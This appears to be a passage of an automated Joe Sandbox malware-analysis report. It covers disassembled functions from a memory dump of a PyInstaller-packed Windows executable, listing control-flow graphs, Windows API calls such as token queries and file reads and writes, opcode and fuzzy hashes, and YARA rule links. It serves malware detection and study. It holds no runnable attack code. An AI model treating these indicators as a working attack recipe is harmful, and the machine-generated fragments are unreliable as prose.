                                                                                                                                                                                                                        control_flow_graph 572 7ff7f250ad6c-7ff7f250ad92 573 7ff7f250adad-7ff7f250adb1 572->573 574 7ff7f250ad94-7ff7f250ada8 call 7ff7f25043d4 call 7ff7f25043f4 572->574 576 7ff7f250b187-7ff7f250b193 call 7ff7f25043d4 call 7ff7f25043f4 573->576 577 7ff7f250adb7-7ff7f250adbe 573->577 592 7ff7f250b19e 574->592 594 7ff7f250b199 call 7ff7f2509bf0 576->594 577->576 579 7ff7f250adc4-7ff7f250adf2 577->579 579->576 583 7ff7f250adf8-7ff7f250adff 579->583 584 7ff7f250ae18-7ff7f250ae1b 583->584 585 7ff7f250ae01-7ff7f250ae13 call 7ff7f25043d4 call 7ff7f25043f4 583->585 590 7ff7f250ae21-7ff7f250ae27 584->590 591 7ff7f250b183-7ff7f250b185 584->591 585->594 590->591 596 7ff7f250ae2d-7ff7f250ae30 590->596 595 7ff7f250b1a1-7ff7f250b1b8 591->595 592->595 594->592 596->585 599 7ff7f250ae32-7ff7f250ae57 596->599 601 7ff7f250ae59-7ff7f250ae5b 599->601 602 7ff7f250ae8a-7ff7f250ae91 599->602 605 7ff7f250ae5d-7ff7f250ae64 601->605 606 7ff7f250ae82-7ff7f250ae88 601->606 603 7ff7f250ae93-7ff7f250aebb call 7ff7f250c90c call 7ff7f2509c58 * 2 602->603 604 7ff7f250ae66-7ff7f250ae7d call 7ff7f25043d4 call 7ff7f25043f4 call 7ff7f2509bf0 602->604 635 7ff7f250aed8-7ff7f250af03 call 7ff7f250b594 603->635 636 7ff7f250aebd-7ff7f250aed3 call 7ff7f25043f4 call 7ff7f25043d4 603->636 633 7ff7f250b010 604->633 605->604 605->606 607 7ff7f250af08-7ff7f250af1f 606->607 610 7ff7f250af9a-7ff7f250afa4 call 7ff7f2512c2c 607->610 611 7ff7f250af21-7ff7f250af29 607->611 622 7ff7f250afaa-7ff7f250afbf 610->622 623 7ff7f250b02e 610->623 611->610 614 7ff7f250af2b-7ff7f250af2d 611->614 614->610 618 7ff7f250af2f-7ff7f250af45 614->618 618->610 625 7ff7f250af47-7ff7f250af53 618->625 622->623 627 7ff7f250afc1-7ff7f250afd3 GetConsoleMode 622->627 631 7ff7f250b033-7ff7f250b053 ReadFile 623->631 625->610 629 7ff7f250af55-7ff7f250af57 625->629 627->623 632 7ff7f250afd5-7ff7f250afdd 627->632 629->610 634 7ff7f250af59-7ff7f250af71 629->634 637 7ff7f250b059-7ff7f250b061 631->637 638 7ff7f250b14d-7ff7f250b156 GetLastError 631->638 632->631 640 7ff7f250afdf-7ff7f250b001 ReadConsoleW 632->640 643 7ff7f250b013-7ff7f250b01d call 7ff7f2509c58 633->643 634->610 644 7ff7f250af73-7ff7f250af7f 634->644 635->607 636->633 637->638 646 7ff7f250b067 637->646 641 7ff7f250b158-7ff7f250b16e call 7ff7f25043f4 call 7ff7f25043d4 638->641 642 7ff7f250b173-7ff7f250b176 638->642 649 7ff7f250b022-7ff7f250b02c 640->649 650 7ff7f250b003 GetLastError 640->650 641->633 654 7ff7f250b009-7ff7f250b00b call 7ff7f2504368 642->654 655 7ff7f250b17c-7ff7f250b17e 642->655 643->595 644->610 653 7ff7f250af81-7ff7f250af83 644->653 647 7ff7f250b06e-7ff7f250b083 646->647 647->643 657 7ff7f250b085-7ff7f250b090 647->657 649->647 650->654 653->610 661 7ff7f250af85-7ff7f250af95 653->661 654->633 655->643 663 7ff7f250b0b7-7ff7f250b0bf 657->663 664 7ff7f250b092-7ff7f250b0ab call 7ff7f250a984 657->664 661->610 668 7ff7f250b13b-7ff7f250b148 call 7ff7f250a7c4 663->668 669 7ff7f250b0c1-7ff7f250b0d3 663->669 672 7ff7f250b0b0-7ff7f250b0b2 664->672 668->672 673 7ff7f250b12e-7ff7f250b136 669->673 674 7ff7f250b0d5 669->674 672->643 673->643 676 7ff7f250b0da-7ff7f250b0e1 674->676 677 7ff7f250b11d-7ff7f250b128 676->677 678 7ff7f250b0e3-7ff7f250b0e7 676->678 677->673 679 7ff7f250b0e9-7ff7f250b0f0 678->679 680 7ff7f250b103 678->680 679->680 681 7ff7f250b0f2-7ff7f250b0f6 679->681 682 7ff7f250b109-7ff7f250b119 680->682 681->680 683 7ff7f250b0f8-7ff7f250b101 681->683 682->676 684 7ff7f250b11b 682->684 683->682 684->673
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: 7e4b6968f21da67f115f2b5899b729ebe27c21aa0167ab1df282e77588440d71
                                                                                                                                                                                                                        • Instruction ID: adf651541fe2b477d03b6f0a77adb144b39afd39361087d4c26c0db33254fdda
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e4b6968f21da67f115f2b5899b729ebe27c21aa0167ab1df282e77588440d71
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1C1E422A0C68752EB60EF5598602BEB751FB90B80F950171DA6E077D1EFFCE855C3A0
                                                                                                                                                                                                                        Function 00007FF7F24F7B50 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 995526605-0
                                                                                                                                                                                                                        • Opcode ID: 748b97fd960fc4e5004671791fa0bd5d217265360f36ca399a643c65045a3ab9
                                                                                                                                                                                                                        • Instruction ID: de1c0c34d6da0715a4bcb1b2921f45018cb3cf7e8dcddede7531b57ba40bec31
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 748b97fd960fc4e5004671791fa0bd5d217265360f36ca399a643c65045a3ab9
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A7212F25B0CA8242EB10AB55A45423AE3A1FBC57F4F900235EA7D43AE4DFECD845C791
                                                                                                                                                                                                                        Function 00007FF7F24F33E0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,00007FF7F24F3534), ref: 00007FF7F24F3411
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F29E0: GetLastError.KERNEL32(?,?,?,00007FF7F24F342E,?,00007FF7F24F3534), ref: 00007FF7F24F2A14
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F29E0: FormatMessageW.KERNEL32(?,?,?,00007FF7F24F342E), ref: 00007FF7F24F2A7D
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F29E0: MessageBoxW.USER32 ref: 00007FF7F24F2ACF
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Message$ErrorFileFormatLastModuleName
                                                                                                                                                                                                                        • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                        • API String ID: 517058245-2863816727
                                                                                                                                                                                                                        • Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                                                        • Instruction ID: 324d46c5197e621f43712a0d9c02314df2b84dde057860ffdb56dd83e582fb46
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2219261B0858291FB21FB24E8513B9A250BFD9795FC00236DA7D8B5D5EFECE904C7A0
                                                                                                                                                                                                                        Function 00007FF7F24F8400 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F7B50: GetCurrentProcess.KERNEL32 ref: 00007FF7F24F7B70
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F7B50: OpenProcessToken.ADVAPI32 ref: 00007FF7F24F7B83
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F7B50: GetTokenInformation.KERNELBASE ref: 00007FF7F24F7BA8
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F7B50: GetLastError.KERNEL32 ref: 00007FF7F24F7BB2
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F7B50: GetTokenInformation.KERNELBASE ref: 00007FF7F24F7BF2
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F7B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7F24F7C0E
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F7B50: CloseHandle.KERNEL32 ref: 00007FF7F24F7C26
                                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00007FF7F24F3814), ref: 00007FF7F24F848C
                                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00007FF7F24F3814), ref: 00007FF7F24F8495
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                        • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                        • API String ID: 6828938-1529539262
                                                                                                                                                                                                                        • Opcode ID: 3b4c49a148c6d93be49ada6c8446d085e6d181d97aae771454943d90599d7390
                                                                                                                                                                                                                        • Instruction ID: 24e8720c93eb1a495042645fc9b3b5140fe9d922792fe64b4721c76fee443a01
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3b4c49a148c6d93be49ada6c8446d085e6d181d97aae771454943d90599d7390
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 64213E21A0864292E710BB50E8252FAB2A0FBC9790FC44035EA6D477D6DFBCD845C7E0
                                                                                                                                                                                                                        Function 00007FF7F250C270 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 819 7ff7f250c270-7ff7f250c295 820 7ff7f250c29b-7ff7f250c29e 819->820 821 7ff7f250c563 819->821 823 7ff7f250c2d7-7ff7f250c303 820->823 824 7ff7f250c2a0-7ff7f250c2d2 call 7ff7f2509b24 820->824 822 7ff7f250c565-7ff7f250c575 821->822 826 7ff7f250c30e-7ff7f250c314 823->826 827 7ff7f250c305-7ff7f250c30c 823->827 824->822 828 7ff7f250c324-7ff7f250c339 call 7ff7f2512c2c 826->828 829 7ff7f250c316-7ff7f250c31f call 7ff7f250b630 826->829 827->824 827->826 834 7ff7f250c33f-7ff7f250c348 828->834 835 7ff7f250c453-7ff7f250c45c 828->835 829->828 834->835 838 7ff7f250c34e-7ff7f250c352 834->838 836 7ff7f250c45e-7ff7f250c464 835->836 837 7ff7f250c4b0-7ff7f250c4d5 WriteFile 835->837 841 7ff7f250c49c-7ff7f250c4ae call 7ff7f250bd28 836->841 842 7ff7f250c466-7ff7f250c469 836->842 839 7ff7f250c4d7-7ff7f250c4dd GetLastError 837->839 840 7ff7f250c4e0 837->840 843 7ff7f250c363-7ff7f250c36e 838->843 844 7ff7f250c354-7ff7f250c35c call 7ff7f2503ae0 838->844 839->840 845 7ff7f250c4e3 840->845 867 7ff7f250c440-7ff7f250c447 841->867 846 7ff7f250c488-7ff7f250c49a call 7ff7f250bf48 842->846 847 7ff7f250c46b-7ff7f250c46e 842->847 849 7ff7f250c37f-7ff7f250c394 GetConsoleMode 843->849 850 7ff7f250c370-7ff7f250c379 843->850 844->843 852 7ff7f250c4e8 845->852 846->867 853 7ff7f250c4f4-7ff7f250c4fe 847->853 854 7ff7f250c474-7ff7f250c486 call 7ff7f250be2c 847->854 857 7ff7f250c39a-7ff7f250c3a0 849->857 858 7ff7f250c44c 849->858 850->835 850->849 860 7ff7f250c4ed 852->860 861 7ff7f250c55c-7ff7f250c561 853->861 862 7ff7f250c500-7ff7f250c505 853->862 854->867 865 7ff7f250c429-7ff7f250c43b call 7ff7f250b8b0 857->865 866 7ff7f250c3a6-7ff7f250c3a9 857->866 858->835 860->853 861->822 868 7ff7f250c507-7ff7f250c50a 862->868 869 7ff7f250c533-7ff7f250c53d 862->869 865->867 872 7ff7f250c3ab-7ff7f250c3ae 866->872 873 7ff7f250c3b4-7ff7f250c3c2 866->873 867->852 876 7ff7f250c50c-7ff7f250c51b 868->876 877 7ff7f250c523-7ff7f250c52e call 7ff7f25043b0 868->877 878 7ff7f250c53f-7ff7f250c542 869->878 879 7ff7f250c544-7ff7f250c553 869->879 872->860 872->873 874 7ff7f250c420-7ff7f250c424 873->874 875 7ff7f250c3c4 873->875 874->845 880 7ff7f250c3c8-7ff7f250c3df call 7ff7f2512cf8 875->880 876->877 877->869 878->821 878->879 879->861 885 7ff7f250c417-7ff7f250c41d GetLastError 880->885 886 7ff7f250c3e1-7ff7f250c3ed 880->886 885->874 887 7ff7f250c40c-7ff7f250c413 886->887 888 7ff7f250c3ef-7ff7f250c401 call 7ff7f2512cf8 886->888 887->874 890 7ff7f250c415 887->890 888->885 892 7ff7f250c403-7ff7f250c40a 888->892 890->880 892->887
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F250C25B), ref: 00007FF7F250C38C
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F250C25B), ref: 00007FF7F250C417
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 953036326-0
                                                                                                                                                                                                                        • Opcode ID: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                                                                                                                                                                                        • Instruction ID: ce90c4b08edfb1cf2bf03780603cb0c014652f729ebf87a391f1599b62d4f169
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B791F6B2B1965385F750EF6598802BDA7A0BF05B89F940175DE2E53AC4EFBCD441C3A0
                                                                                                                                                                                                                        Function 00007FF7F2504938 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1279662727-0
                                                                                                                                                                                                                        • Opcode ID: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                                                                                                                                                                        • Instruction ID: 673c3b7304796adb5fd15c45b5a0e0803624c59776cc632b4693156f7cff0b9d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 70419422D1878243E754EF619910379B261FB94764F509374EAAC03AD5EFBCA5E0C7A0
                                                                                                                                                                                                                        Function 00007FF7F24FBF5C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3251591375-0
                                                                                                                                                                                                                        • Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                                                                        • Instruction ID: 5a421d28e946ae8ae5e57d1099e61fbeee3e80c50292e55346a30779e65c9d3b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 90313A11E0E14345FB14FB64E4267B9A2819F95384FC45075E93E4BAD3DEECAC05C6B1
                                                                                                                                                                                                                        Function 00007FF7F2508D48 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                                                                        • Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                                                        • Instruction ID: beca6f3b0157d2622f605144f8a7f5e6cc2f4c8934adc3afcaa21493d250863b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 76D09E11F28A0787EB587F705C6D97992115F5C711F9426B8D86B0B3E3EEACA81DC2E0
                                                                                                                                                                                                                        Function 00007FF7F24FF45C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
                                                                                                                                                                                                                        • Instruction ID: 8168b787d564d7f34d58842c04def89b53a1d686124115137c9bfa2d16a5a0f4
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6951E462B0924247FB28AE25940067AA291FFC4FB4F954634DE7C037D6CEFCE841C6A0
                                                                                                                                                                                                                        Function 00007FF7F250B444 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
